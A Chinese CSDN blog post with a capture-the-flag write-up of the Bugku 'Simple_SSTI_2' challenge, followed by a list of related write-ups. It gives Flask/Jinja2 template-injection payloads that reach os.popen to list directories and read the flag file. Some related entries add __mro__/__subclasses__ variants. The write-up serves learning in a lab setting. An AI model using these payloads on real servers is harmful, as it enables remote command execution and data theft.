Bugku WEB Simple_SSTI_2

最新推荐文章于 2024-04-21 18:47:10 发布
最新推荐文章于 2024-04-21 18:47:10 发布
阅读量1.5k 收藏 5
点赞数 3
原文链接:https://blog.csdn.net/qq_46230755/article/details/114646032
版权

1. 打开后,题目提示存在模板注入

2. 先进行ls查看一下存在的文件。

/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}}

根据URL转换表%20 -> 空格 %27 -> ', 上面的URL对应字符串为:

/?flag={{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}

3. 查看网页返回结果,发现存在一些文件夹

在这里插入图片描述

4. 进行一个个进入查看,发现第一个看的app文件夹里就有flag

?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../app/%27).read()%20}}

在这里插入图片描述

5. 因为没有过滤直接cat ../app/flag

?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()%20}}

在这里插入图片描述

https://blog.csdn.net/qq_46230755/article/details/114646032

AquilaEAG
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BugKu CTF之 Simple_SSTI_2
weixin_42557264的博客
09-16 1865
进入场景 和Simple_SSTI_1一样 提示需要传一个flag参数 F12也没有任何其他提示 ls一下看看内部文件 /?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}} 发现存在一些文件夹,进入查看,先看看第一个,运气很好,第一个app文件夹里就有flag 因为没有过滤直接cat …/app/flag ?flag={{%20config.__clas.
Bugku web Simple_SSTI_2 wp
Whaocai的博客
08-05 609
考点: ①SSTI注入 最近学了学python ssti注入,找一道题练习练习。 进去之后,提示我们有个flag参数,同时再用御剑扫一下发现没有别的页面。 结合题目,直接payload:?flag={{1+1}},用的是flask模板 jinja2引擎 常见的ssti构造payload思路是: 这道题比较简单,什么敏感关键词都没有过滤 ...
WEB Simple_SSTI_2
m0_57954651的博客
05-02 444
打开题目 似乎和第一题有相同之处 先来测试一下有没有类似注入的漏洞 回显正常 说明方向没错 再此构造 ?flag={{''.__class__.__mro__}}(借鉴大佬..) 用mro回显到了两类 str object 我们可利用第二的object来作突破 THEN 利用subclasses这个参数 __subclasses__属性会输出该类下所有的子类 ?flag={{''.__class__.__mro__[1].__subclasses__() }} 看到了里面的...
【愚公系列】2023年06月 Bugku-WebSimple_SSTI_2)
时光隧道
06-22 6075
Flask是一个使用Python编写的轻量级Web应用框架。它的设计目标是简单明了,易于扩展和维护。Flask提供了基本的Web开发所需的组件,如路由、请求和响应处理、会话管理、模板渲染等,同时还支持各种第三方扩展和插件,可以轻松地实现各种复杂的Web应用开发。Flask框架也因其灵活性和简易性而广受欢迎,被许多Web开发者用于构建Web应用和API。Flask是一个使用Python编写的轻量级Web应用框架。它的设计目标是简单明了,易于扩展和维护。
bugku解题篇—Simple_SSTI_2
最新发布
XZ_______的博客
04-21 334
解题
Bugku Simple_SSTI_2
qq_52718293的博客
10-23 2495
首先打开之后是上面这样,题目有提示是ssti,所以
bugku web Simple_SSTI_1 Simple_SSTI_2
weixin_45225566的博客
10-19 289
一、知识点 flask模板注入 {{config}} 可以获取当前设置 __class__ 用来查看变量所属的类,根据前面的变量形式可以得到其所属的类 __init__ 初始化类,返回的类型是function __globals__[] 函数名.__globals__获取function所处空间下可使用的module、方法以及所有变量 read() 获取返回内容 二、Simple_SSTI_1 http://114.67.246.176:14745/?fla
BugkuWebSimple_SSTI_2
Light_inthe_eyes的博客
11-04 210
题目提示就很明显了是模板注入 flag={{config.__class__.__init__.__globals__['os'].popen('ls ../').read() }} flag={{config.__class__.__init__.__globals__['os'].popen('ls ../app').read() }} flag={{config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read
全国大学生信息安全竞赛决赛web4,SSTI+TensorFlow模型.zip
08-20
全国大学生信息安全竞赛决赛web4,SSTI+TensorFlow模型.zip 全国大学生信息安全竞赛决赛web4,SSTI+TensorFlow模型.zip 全国大学生信息安全竞赛决赛web4,SSTI+TensorFlow模型.zip 全国大学生信息安全竞赛决赛web...
Bugku CTF-Web篇writeup Simple_SSTI_1-2
anlr2020的博客
07-13 3225
Simple_SSTI_1 根据题目名得知为 简单_服务器模板注入 打开服务器场景英文提示,“你需要传入一个名为flag的参数”,得到参数名为flag F12或Ctrl+U查看一下网页代码 “你知道,在flask框架中,我们通常设置一个SECRET_KEY变量” flask:是由python实现的一种微web框架 SECRET_KEY:flask中的一种配置属性,flask涉及安全的东西需要用这个SECRET_KEY密钥进行加密 基本上根据提示可以确定题目的flag就藏在SECR..
BugKu Simple_SSTI_2 模板注入
weixin_68254517的博客
11-12 172
题目源码如下<head></head><body></body></html>解题方法为模板注入。解题方法:查看根目录?执行结果我们挨个查看目录,从第一个开始?执行结果直接查看flag文件?获得flag模板引擎用于使用动态数据呈现内容。此上下文数据通常由用户控制并由模板进行格式化,以生成网页、电子邮件等。模板引擎通过使用代码构造(如条件语句、循环等)处理上下文数据,允许在模板中使用强大的语言表达式,以呈现动态内容。
[bugku]Simple_SSTI_2
ZhShy
03-10 3363
进入页面之后F12没发现什么有用的东西。 照例看看config: http://114.67.175.224:12482/?flag={{config}} 没有flag 试一试 http://114.67.175.224:12482/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}} __class__:用来查看变量所属的类,根据前面的变量形式可以得到其所属的类。 __i
bugku--Simple_SSTI_1---2
qq_51802152的博客
12-14 544
bugku--Simple_SSTI_1---2
Bugku CTF——WEBSSTI学习笔记
qq_51096893的博客
12-19 4288
目录 知识前提 一.题目 二 .理解和学习 三.总结 我们在作为新手去开始进行这些题目的联系的时候只知道一些操作,而不知道原理,这里为新手简单介绍一些SSTI的概念和操作。 知识前提 我们通过实例去一起学习。学习这个之前,我们要知道以下几点: (1)什么是CTF(Capture The Flag) (2)CTF题目类型(我们今天讲解的是WEB类型中注入问题): 1.MISC(Miscellaneous)类型,即安全杂项,题目或涉及流量分析、电子取证、人肉搜索、数据分析等等。 2.P.
BugkuSimple_SSTI_2
weixin_52599204的博客
08-05 399
然后发现里面直接显示了 那么接下来就是找系统命令执行语句的语法。由于题目提示是模板注入,于是直接上payload。说实话原来也没怎么了解过这个框架 于是找了找命令。首先打开环境 提示需要传一个flag参数。这里引用大佬的博客 感兴趣的可以去看看。找到圈起来这条 把里面的。...
bugkuctf-Simple_SSTI_2
qq_51775369的博客
03-10 5418
bugku-ctf
Bugku [Simple_SSTI_2](基于ctf题目学习SSTI服务器模板注入)
MAHRE_Z的博客
11-09 653
打开网址发现一串英文,提示“You need pass in a parameter named flag”(“您需要传入一个名为 flag 的参数”),根据题目提示SSTI,搜索一下SSTI,发现一篇文章介绍。显示为flag参数的值,可以知道页面会显示被传入flag参数的值,然后进行报错看一看网站使用的模板类型。不错,其中有讲到什么是注入,说是格式化字符串漏洞的一种体现,然后我就又找了一篇关于。发现目录,进入app目录,发现flag文件。用cat命令查看flag,得到flag。
bugku中的web
m0_62619269的博客
05-20 703
Simple_SSTI_1 先来简单看一下什么是SSTI模板注入 {{ … }}:装载一个变量,模板渲染的时候,会使用传进来的同名参数这个变量代表的值替换掉。 {% … %}:装载一个控制语句。 {# … #}:装载一个注释,模板渲染的时候会忽视这中间的值 很简单的模板注入,查看页面源代码 很明显,flag在secret_key下。最下面说在flas k里,我们经常建立一个SECRET_KEY,上方模板注入,直接访问URL+?flag={undefined{ config .SECRET_KEY}}得到f
bugku学习5:Simple_SSTI_2(web
weixin_46041615的博客
11-02 3853
打开页面显示: 根据题目给的ssti得知是模块
bugku simple_ssti_1
03-16
simple_ssti_1 是一道来自 Bugku 的简单 Server-Side Template Injection(SSTI)漏洞题目。 SSTI 漏洞通常发生在使用模板引擎时,攻击者可以利用这种漏洞执行任意代码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值